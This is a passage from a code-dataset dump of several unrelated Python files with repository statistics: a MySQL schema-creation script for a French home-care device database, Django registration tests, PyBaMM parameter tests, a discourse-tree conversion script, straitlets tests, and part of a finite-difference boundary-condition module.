FOREIGN KEY (`TPDT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_R_TYPEPRODUIT_TPDT` (`TPDT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_E_PRODUIT_PDT Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_AUTHENTIFICATION_AUTH` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_AUTHENTIFICATION_AUTH` (
`AUTH_ID` INT NOT NULL AUTO_INCREMENT,
`AUTH_USERNAME` VARCHAR(45) NOT NULL,
`AUTH_PASSWORD` VARCHAR(45) NOT NULL,
`PRS_ID` INT NOT NULL,
PRIMARY KEY (`AUTH_ID`),
INDEX `index2` (`AUTH_USERNAME` ASC, `AUTH_PASSWORD` ASC),
INDEX `fk_TR_AUTHENTIFICATION_AUTH_1_idx` (`PRS_ID` ASC),
CONSTRAINT `fk_TR_AUTHENTIFICATION_AUTH_1`
FOREIGN KEY (`PRS_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (`PRS_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_R_AUTHENTIFICATION_AUTH Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_LOCALISATIONPRODUIT_LOC` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_LOCALISATIONPRODUIT_LOC` (
`LOC_ID` INT NOT NULL AUTO_INCREMENT,
`LOC_LIBELLE` VARCHAR(45) NOT NULL,
`LOC_TYPE` VARCHAR(45) NOT NULL,
`LOC_NOTES` VARCHAR(300) NULL,
PRIMARY KEY (`LOC_ID`),
INDEX `index2` (`LOC_LIBELLE` ASC, `LOC_TYPE` ASC))
ENGINE = InnoDB;""")
print('T_E_LOCALISATIONPRODUIT_LOC Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEINTERVENTION_TPI` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEINTERVENTION_TPI` (
`TPI_ID` INT NOT NULL AUTO_INCREMENT,
`TPI_LIBELLE` VARCHAR(45) NOT NULL,
`TPI_TYPE` VARCHAR(45) NOT NULL,
PRIMARY KEY (`TPI_ID`),
INDEX `index2` (`TPI_LIBELLE` ASC, `TPI_TYPE` ASC))
ENGINE = InnoDB;""")
print('T_R_TYPEINTERVENTION_TPI Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_AUTONOMIE_AUT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_AUTONOMIE_AUT` (
`AUT_ID` INT NOT NULL AUTO_INCREMENT,
`AUT_DEPENDANCE` VARCHAR(5) NOT NULL,
`AUT_DEFINITION` VARCHAR(105) NOT NULL,
PRIMARY KEY (`AUT_ID`),
INDEX `index2` (`AUT_DEPENDANCE` ASC, `AUT_DEFINITION` ASC))
ENGINE = InnoDB;""")
print('T_A_AUTONOMIE_AUT Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` (
`CTT_ID` INT NOT NULL AUTO_INCREMENT,
`CTT_INTITULECONTRAT` VARCHAR(45) NOT NULL,
`CTT_REFCONTRAT` VARCHAR(45) NOT NULL,
`AUT_ID` INT NOT NULL,
`CTT_DEBUTCONTRAT` DATE NOT NULL,
`CTT_DATENAISSANCEBENEFICIAIRE` DATE NOT NULL,
`CTT_TEL` VARCHAR(45) NULL,
`PRS_ID` INT NOT NULL,
PRIMARY KEY (`CTT_ID`),
INDEX `fk_TR_CONTRAT_CTT_1_idx` (`AUT_ID` ASC),
INDEX `fk_TR_CONTRATBENEFICIAIRE_CTT_TE_PERSONNE_PRS1_idx` (`PRS_ID` ASC),
CONSTRAINT `fk_TR_CONTRAT_CTT_1`
FOREIGN KEY (`AUT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_A_AUTONOMIE_AUT` (`AUT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_PERSONNE_PRS1`
FOREIGN KEY (`PRS_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (`PRS_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_R_BENEFICIAIRE_CTT Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` (
`INT_ID` INT NOT NULL AUTO_INCREMENT,
`ADR_ID` INT NOT NULL,
`INT_DATEINTERVENTION` DATE NOT NULL,
`INT_PRESENCEANIMALMOYEN` TINYINT(1) NOT NULL DEFAULT 0,
`NOTES` VARCHAR(300) NULL,
`CTT_ID` INT NOT NULL,
`TPI_ID` INT NOT NULL,
PRIMARY KEY (`INT_ID`),
INDEX `fk_TR_INTERVENTION_INT_1_idx` (`TPI_ID` ASC),
INDEX `fk_TR_INTERVENTION_INT_2_idx` (`CTT_ID` ASC),
CONSTRAINT `fk_TR_INTERVENTION_INT_1`
FOREIGN KEY (`TPI_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`TR_TYPEINTERVENTION_TPI` (`TPI_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TR_INTERVENTION_INT_2`
FOREIGN KEY (`CTT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` (`CTT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_E_INTERVENTION_INT Table created successfully')
##############
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_INTERCONNEXION_INTCO` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_INTERCONNEXION_INTCO` (
`INTCO_ID` INT NOT NULL AUTO_INCREMENT,
`DATEEVENEMENT` DATETIME(6) NOT NULL,
`VALEUR` VARCHAR(45) NOT NULL,
`PDT_ID` INT NOT NULL,
`INTCO_ADRESSEIP` VARCHAR(20) NOT NULL,
PRIMARY KEY (`INTCO_ID`),
INDEX `fk_TR_COMMUNICATION_COM_1_idx` (`PDT_ID` ASC),
CONSTRAINT `fk_TR_COMMUNICATION_COM_1`
FOREIGN KEY (`PDT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` (`PDT_SERIALNUMBER`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_R_INTERCONNEXION_INTCO Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_J_CTT_ADR_PDT_INT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_J_CTT_ADR_PDT_INT` (
`PDT_SERIALNUMBER` INT NOT NULL,
`INT_ID` INT NOT NULL,
`NOTES` VARCHAR(300) NULL,
`LOC_ID` INT NOT NULL,
`CTT_ID` INT NOT NULL,
`ADR_ID` INT NOT NULL,
INDEX `fk_TJ_CTT_ADR_PDT_INT_2_idx` (`LOC_ID` ASC),
INDEX `fk_TJ_CTT_ADR_PDT_INT_3_idx` (`PDT_SERIALNUMBER` ASC),
INDEX `fk_TJ_CTT_ADR_PDT_INT_4_idx` (`INT_ID` ASC),
INDEX `fk_TJ_CTT_ADR_PDT_INT_5_idx` (`CTT_ID` ASC),
INDEX `fk_TJ_CTT_ADR_PDT_INT_1_idx` (`ADR_ID` ASC),
CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_2`
FOREIGN KEY (`LOC_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`TE_LOCALISATIONPRODUIT_LOC` (`LOC_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_3`
FOREIGN KEY (`PDT_SERIALNUMBER`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` (`PDT_SERIALNUMBER`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_4`
FOREIGN KEY (`INT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` (`INT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_5`
FOREIGN KEY (`CTT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` (`CTT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_1`
FOREIGN KEY (`ADR_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_ADRESSEPOSTALE_ADR` (`ADR_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print("table jointure T_J_CTT_ADR_PDT_INT créée ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEMORALE_PEM` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEMORALE_PEM` (
`PEM_NUMEROSIREN` INT NOT NULL,
`PEM_RAISONSOCIALE` VARCHAR(45) NOT NULL,
`PEM_TYPEACTIVITE` VARCHAR(60) NOT NULL,
`PEM_SIRET` VARCHAR(45) NULL,
PRIMARY KEY (`PEM_NUMEROSIREN`),
INDEX `index2` (`PEM_RAISONSOCIALE` ASC))
ENGINE = InnoDB;""")
print('T_E_PERSONNEMORALE_PEM créée')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_J_EMPLOYE_EMP` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_J_EMPLOYE_EMP` (
`EMP_ID` INT NOT NULL,
`PEM_ID` INT NOT NULL,
`INT_ID` INT NOT NULL,
`EMP_TELEPHONE` CHAR(15) NOT NULL,
`EMP_EMAIL` VARCHAR(45) NOT NULL,
INDEX `fk_TE_PRESTATAIRE_PREST_2_idx` (`PEM_ID` ASC),
INDEX `fk_TE_PRESTATAIRE_PREST_3_idx` (`INT_ID` ASC),
CONSTRAINT `fk_TE_PRESTATAIRE_PREST_1`
FOREIGN KEY (`EMP_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (`PRS_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_PRESTATAIRE_PREST_2`
FOREIGN KEY (`PEM_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEMORALE_PEM` (`PEM_NUMEROSIREN`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_PRESTATAIRE_PREST_3`
FOREIGN KEY (`INT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` (`INT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_J_EMPLOYE_EMP Table created successfully')
cursor.execute("""SET SQL_MODE=@OLD_SQL_MODE;""")
cursor.execute("""SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;""")
cursor.execute("""SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;""")
except mysql.connector.Error as error:
print("Failed to create table in MySQL: {}".format(error))
finally:
if (connection.is_connected()):
cursor.close()
connection.close()
print("MySQL connection is closed")
| 43.102151 | 137 | 0.674192 | 2,306 | 16,034 | 4.364267 | 0.095837 | 0.051471 | 0.077504 | 0.083466 | 0.687003 | 0.590421 | 0.50626 | 0.482015 | 0.459161 | 0.419316 | 0 | 0.030988 | 0.205002 | 16,034 | 371 | 138 | 43.218329 | 0.758531 | 0.008607 | 0 | 0.248466 | 0 | 0 | 0.850167 | 0.247306 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.015337 | 0.018405 | 0 | 0.018405 | 0.064417 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69c5c7a7d8c414585a90c6896cbf35b9061ae450 | 6,136 | py | Python | authors/apps/authentication/tests/test_register.py | andela/ah-code-titans | 4f1fc77c2ecdf8ca15c24327d39fe661eac85785 | [
"BSD-3-Clause"
] | null | null | null | authors/apps/authentication/tests/test_register.py | andela/ah-code-titans | 4f1fc77c2ecdf8ca15c24327d39fe661eac85785 | [
"BSD-3-Clause"
] | 20 | 2018-11-26T16:22:46.000Z | 2018-12-21T10:08:25.000Z | authors/apps/authentication/tests/test_register.py | andela/ah-code-titans | 4f1fc77c2ecdf8ca15c24327d39fe661eac85785 | [
"BSD-3-Clause"
] | 3 | 2019-01-24T15:39:42.000Z | 2019-09-25T17:57:08.000Z | from rest_framework import status
from django.urls import reverse
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
from ..models import User
from ..token import account_activation_token
# local import
from authors.base_test_config import TestConfiguration
class TestRegister(TestConfiguration):
""" Test suite for user registration """
def register_user(self, data):
""" function register a new user """
return self.client.post(
reverse("create_user"),
data,
content_type='application/json'
)
def test_registration_email_verification(self):
response_details = self.register_user(self.new_user)
user_details = User.objects.get(username=self.new_user['user']['username'])
pk = urlsafe_base64_encode(force_bytes(user_details.id)).decode()
token = account_activation_token.make_token(self.new_user)
activate_url = 'http://localhost:8000/api/activate/account/{pk}/{token}'.format(pk=pk, token=token)
response = self.client.get(
activate_url,
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
def test_empty_username(self):
""" test empty username """
self.new_user["user"]["username"] = ''
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertEqual(
response.data["errors"]["username"][0],
"This field may not be blank."
)
def test_invalid_email(self):
""" test invalid email """
self.new_user["user"]["email"] = 'kimameß'
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertEqual(
response.data["errors"]["email"][0],
"Enter a valid email address."
)
def test_empty_email(self):
""" test invalid email """
self.new_user["user"]["email"] = ''
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertEqual(
response.data["errors"]["email"][0],
"This field may not be blank."
)
def test_invalid_password(self):
""" test invalid password """
self.new_user["user"]["password"] = 'rtryyr'
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertIn(
"password with at least 8 characters",
response.data["errors"]["password"][0]
)
def test_empty_password(self):
""" test invalid password """
self.new_user["user"]["password"] = ''
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertEqual(
response.data["errors"]["password"][0],
"This field may not be blank."
)
def test_uppercase_password(self):
""" test that the password contains an uppercase letter """
self.new_user["user"]["password"] = 'codetitans32'
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertIn(
"at least one number, an uppercase or lowercase letter",
response.data["errors"]["password"][0]
)
def test_lowercase_password(self):
""" test that the password contains an lowercase letter """
self.new_user["user"]["password"] = 'CODETITANS32'
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertIn(
"at least one number, an uppercase or lowercase letter",
response.data["errors"]["password"][0]
)
def test_special_character_password(self):
""" test that the password contains a special character """
self.new_user["user"]["password"] = 'Codetitans32'
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertIn(
"lowercase letter or one special character",
response.data["errors"]["password"][0]
)
def test_number_in_password(self):
""" test that the password contains a number """
self.new_user["user"]["password"] = 'Codetitans@!'
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
self.assertIn(
"Password should have at least one number",
response.data["errors"]["password"][0]
)
def test_register_user(self):
""" test register user """
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_201_CREATED
)
def test_existing_email(self):
""" test register with existing user email """
self.new_user["user"]["email"] = self.user["user"]["email"]
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
def test_existing_username(self):
""" test register with existing username """
self.new_user["user"]["username"] = self.user["user"]["username"]
response = self.register_user(self.new_user)
self.assertEqual(
response.status_code,
status.HTTP_400_BAD_REQUEST
)
| 31.306122 | 107 | 0.602347 | 669 | 6,136 | 5.313901 | 0.168909 | 0.060759 | 0.08045 | 0.073136 | 0.686639 | 0.662166 | 0.625879 | 0.585091 | 0.539522 | 0.531083 | 0 | 0.014443 | 0.289113 | 6,136 | 195 | 108 | 31.466667 | 0.80055 | 0.078716 | 0 | 0.486111 | 0 | 0 | 0.138111 | 0 | 0 | 0 | 0 | 0 | 0.152778 | 1 | 0.097222 | false | 0.138889 | 0.048611 | 0 | 0.159722 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
69c769830c272d7a9f4d246a127dbb4b3989b330 | 1,399 | py | Python | tests/unit/test_parameters/test_geometric_parameters.py | manjunathnilugal/PyBaMM | 65d5cba534b4f163670e753714964aaa75d6a2d2 | [
"BSD-3-Clause"
] | 330 | 2019-04-17T11:36:57.000Z | 2022-03-28T16:49:55.000Z | tests/unit/test_parameters/test_geometric_parameters.py | masoodtamaddon/PyBaMM | a31e2095600bb92e913598ac4d02b2b6b77b31c1 | [
"BSD-3-Clause"
] | 1,530 | 2019-03-26T18:13:03.000Z | 2022-03-31T16:12:53.000Z | tests/unit/test_parameters/test_geometric_parameters.py | masoodtamaddon/PyBaMM | a31e2095600bb92e913598ac4d02b2b6b77b31c1 | [
"BSD-3-Clause"
] | 178 | 2019-03-27T13:48:04.000Z | 2022-03-31T09:30:11.000Z | #
# Tests for the standard parameters
#
import pybamm
import unittest
class TestGeometricParameters(unittest.TestCase):
def test_macroscale_parameters(self):
geo = pybamm.geometric_parameters
L_n = geo.L_n
L_s = geo.L_s
L_p = geo.L_p
L_x = geo.L_x
l_n = geo.l_n
l_s = geo.l_s
l_p = geo.l_p
parameter_values = pybamm.ParameterValues(
values={
"Negative electrode thickness [m]": 0.05,
"Separator thickness [m]": 0.02,
"Positive electrode thickness [m]": 0.21,
}
)
L_n_eval = parameter_values.process_symbol(L_n)
L_s_eval = parameter_values.process_symbol(L_s)
L_p_eval = parameter_values.process_symbol(L_p)
L_x_eval = parameter_values.process_symbol(L_x)
self.assertEqual(
(L_n_eval + L_s_eval + L_p_eval).evaluate(), L_x_eval.evaluate()
)
l_n_eval = parameter_values.process_symbol(l_n)
l_s_eval = parameter_values.process_symbol(l_s)
l_p_eval = parameter_values.process_symbol(l_p)
self.assertAlmostEqual((l_n_eval + l_s_eval + l_p_eval).evaluate(), 1)
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
| 28.55102 | 78 | 0.620443 | 197 | 1,399 | 4.020305 | 0.28934 | 0.025253 | 0.167929 | 0.229798 | 0.433081 | 0.433081 | 0.391414 | 0.391414 | 0.391414 | 0.391414 | 0 | 0.01003 | 0.287348 | 1,399 | 48 | 79 | 29.145833 | 0.784353 | 0.023588 | 0 | 0 | 0 | 0 | 0.091777 | 0 | 0 | 0 | 0 | 0 | 0.054054 | 1 | 0.027027 | false | 0 | 0.081081 | 0 | 0.135135 | 0.027027 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69c79c1acedc30f9a5022e2647ed20f40fd5e207 | 1,860 | py | Python | src/preprocessing1/convert_ctrees_to_dtrees_rstdt.py | norikinishida/discourse-parsing | 7377a78cc32ad6430d256694e31ed9426e7c6340 | [
"Apache-2.0"
] | 2 | 2022-02-16T20:41:22.000Z | 2022-03-11T18:28:24.000Z | src/preprocessing1/convert_ctrees_to_dtrees_rstdt.py | norikinishida/discourse-parsing | 7377a78cc32ad6430d256694e31ed9426e7c6340 | [
"Apache-2.0"
] | null | null | null | src/preprocessing1/convert_ctrees_to_dtrees_rstdt.py | norikinishida/discourse-parsing | 7377a78cc32ad6430d256694e31ed9426e7c6340 | [
"Apache-2.0"
] | null | null | null | import argparse
import os
import pyprind
import utils
import treetk
import treetk.rstdt
def main(args):
"""
We use n-ary ctrees (ie., *.labeled.nary.ctree) to generate dtrees.
Morey et al. (2018) demonstrate that scores evaluated on these dtrees are superficially lower than those on right-heavy binarized trees (ie., *.labeled.bin.ctree).
"""
path = args.path
filenames = os.listdir(path)
filenames = [n for n in filenames if n.endswith(".labeled.nary.ctree")]
filenames.sort()
def func_label_rule(node, i, j):
relations = node.relation_label.split("/")
if len(relations) == 1:
return relations[0] # Left-most node is head.
else:
if i > j:
return relations[j]
else:
return relations[j-1]
for filename in pyprind.prog_bar(filenames):
sexp = utils.read_lines(
os.path.join(path, filename),
process=lambda line: line.split())
assert len(sexp) == 1
sexp = sexp[0]
# Constituency
ctree = treetk.rstdt.postprocess(treetk.sexp2tree(sexp, with_nonterminal_labels=True, with_terminal_labels=False))
# Dependency
# Assign heads
ctree = treetk.rstdt.assign_heads(ctree)
# Conversion
dtree = treetk.ctree2dtree(ctree, func_label_rule=func_label_rule)
arcs = dtree.tolist(labeled=True)
# Write
with open(os.path.join(
path,
filename.replace(".labeled.nary.ctree", ".arcs")), "w") as f:
f.write("%s\n" % " ".join(["%d-%d-%s" % (h,d,l) for h,d,l in arcs]))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--path", type=str, required=True)
args = parser.parse_args()
main(args=args)
| 30 | 167 | 0.597849 | 233 | 1,860 | 4.669528 | 0.493562 | 0.030331 | 0.044118 | 0.025735 | 0.040441 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00824 | 0.282258 | 1,860 | 61 | 168 | 30.491803 | 0.806742 | 0.166667 | 0 | 0.051282 | 1 | 0 | 0.047244 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 1 | 0.051282 | false | 0 | 0.153846 | 0 | 0.282051 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69d1dab7f54ca1ad815eec0feddd2d80d74004a4 | 912 | py | Python | straitlets/tests/test_test_utils.py | quantopian/serializable-traitlets | f7de75507978e08446a15894a8417997940ea7a6 | [
"Apache-2.0"
] | 13 | 2016-01-27T01:55:18.000Z | 2022-02-10T12:09:46.000Z | straitlets/tests/test_test_utils.py | quantopian/serializable-traitlets | f7de75507978e08446a15894a8417997940ea7a6 | [
"Apache-2.0"
] | 5 | 2016-02-17T13:52:50.000Z | 2018-12-13T21:30:26.000Z | straitlets/tests/test_test_utils.py | quantopian/serializable-traitlets | f7de75507978e08446a15894a8417997940ea7a6 | [
"Apache-2.0"
] | 10 | 2017-07-21T14:27:17.000Z | 2022-03-16T11:19:47.000Z | """
Tests for the test utils.
"""
import pytest
from straitlets import Serializable, Integer
from straitlets.test_utils import assert_serializables_equal
def test_assert_serializables_equal():
class Foo(Serializable):
x = Integer()
y = Integer()
class Bar(Serializable):
x = Integer()
y = Integer()
assert_serializables_equal(Foo(x=1, y=1), Foo(x=1, y=1))
with pytest.raises(AssertionError):
assert_serializables_equal(Foo(x=1, y=1), Bar(x=1, y=1))
with pytest.raises(AssertionError):
assert_serializables_equal(Foo(x=1, y=1), Foo(x=1, y=2))
with pytest.raises(AssertionError):
assert_serializables_equal(
Foo(x=1, y=1),
Foo(x=1, y=2),
skip=('x',),
)
assert_serializables_equal(Foo(x=1), Foo(x=1), skip=('y',))
assert_serializables_equal(Foo(y=1), Foo(y=1), skip=('x',))
| 25.333333 | 64 | 0.625 | 127 | 912 | 4.346457 | 0.204724 | 0.036232 | 0.081522 | 0.076087 | 0.586957 | 0.485507 | 0.432971 | 0.432971 | 0.432971 | 0.432971 | 0 | 0.028409 | 0.22807 | 912 | 35 | 65 | 26.057143 | 0.755682 | 0.027412 | 0 | 0.304348 | 0 | 0 | 0.003413 | 0 | 0 | 0 | 0 | 0 | 0.478261 | 1 | 0.043478 | false | 0 | 0.130435 | 0 | 0.434783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69d2955809d68e17f8be812fa27e25216fd7813e | 4,026 | py | Python | fdm/analysis/tools.py | szajek/FDM | 6270b0eb2bf3ef80f2ed87d0f39cf39ab82ae02b | [
"MIT"
] | 1 | 2017-11-12T09:57:52.000Z | 2017-11-12T09:57:52.000Z | fdm/analysis/tools.py | szajek/FDM | 6270b0eb2bf3ef80f2ed87d0f39cf39ab82ae02b | [
"MIT"
] | null | null | null | fdm/analysis/tools.py | szajek/FDM | 6270b0eb2bf3ef80f2ed87d0f39cf39ab82ae02b | [
"MIT"
] | null | null | null | import numpy
from fdm.geometry import create_close_point_finder
def create_weights_distributor(close_point_finder):
def distribute(point, value):
close_points = close_point_finder(point)
distance_sum = sum(close_points.values())
return dict(
{p: (1. - distance/distance_sum)*value for p, distance in close_points.items()},
)
return distribute
def apply_statics_bc(variables, matrix, vector, bcs):
extra_bcs = extract_extra_bcs(bcs)
replace_bcs = extract_replace_bcs(bcs)
extra_bcs_number = len(extra_bcs)
_matrix = numpy.copy(matrix)
_vector = numpy.copy(vector)
assert (_rows_number(_matrix) == len(variables), 'Number of BCs must be equal "vars_number" - "real_nodes_number"')
points = list(variables)
matrix_bc_applicator = create_matrix_bc_applicator(_matrix, points, variables)
vector_bc_applicator = create_vector_bc_applicator(_vector)
for i, (scheme, value, replace) in enumerate(replace_bcs):
matrix_bc_applicator(variables[replace], scheme)
vector_bc_applicator(variables[replace], value)
initial_idx = _rows_number(matrix) - extra_bcs_number
for i, (scheme, value, _) in enumerate(extra_bcs):
matrix_bc_applicator(initial_idx + i, scheme)
vector_bc_applicator(initial_idx + i, value)
return _matrix, _vector
def apply_dynamics_bc(variables, matrix_a, matrix_b, bcs):
extra_bcs = extract_extra_bcs(bcs)
replace_bcs = extract_replace_bcs(bcs)
extra_bcs_number = len(extra_bcs)
_matrix_a = numpy.copy(matrix_a)
_matrix_b = numpy.copy(matrix_b)
assert _rows_number(_matrix_a) == len(variables), 'Number of BCs must be equal "vars_number" - "real_nodes_number"'
points = list(variables)
matrix_a_bc_applicator = create_matrix_bc_applicator(_matrix_a, points, variables)
matrix_b_bc_applicator = create_matrix_bc_applicator(_matrix_b, points, variables)
for i, (scheme_a, scheme_b, replace) in enumerate(replace_bcs):
matrix_a_bc_applicator(variables[replace], scheme_a)
matrix_b_bc_applicator(variables[replace], scheme_b)
initial_idx = _rows_number(_matrix_a) - extra_bcs_number
for i, (scheme_a, scheme_b, _) in enumerate(extra_bcs):
matrix_a_bc_applicator(initial_idx + i, scheme_a)
matrix_b_bc_applicator(initial_idx + i, scheme_b)
return _matrix_a, _matrix_b
def extract_extra_bcs(bcs):
return [bc for bc in bcs if bc.replace is None]
def extract_replace_bcs(bcs):
return [bc for bc in bcs if bc.replace is not None]
def create_matrix_bc_applicator(matrix, points, variables, tol=1e-6):
def apply(row_idx, scheme):
matrix[row_idx, :] = 0.
if len(scheme):
distributor = SchemeToNodesDistributor(points)
scheme = distributor(scheme)
scheme = scheme.drop(tol)
for p, weight in scheme.items():
col_idx = variables[p]
matrix[row_idx, col_idx] = weight
return apply
def create_vector_bc_applicator(vector):
def apply(row_idx, value):
vector[row_idx] = value
return apply
def _zero_vector_last_rows(vector, number):
_vector = numpy.zeros(vector.shape)
_vector[:-number] = vector[:-number]
return _vector
def _zero_matrix_last_rows(matrix, number):
_matrix = numpy.zeros(matrix.shape)
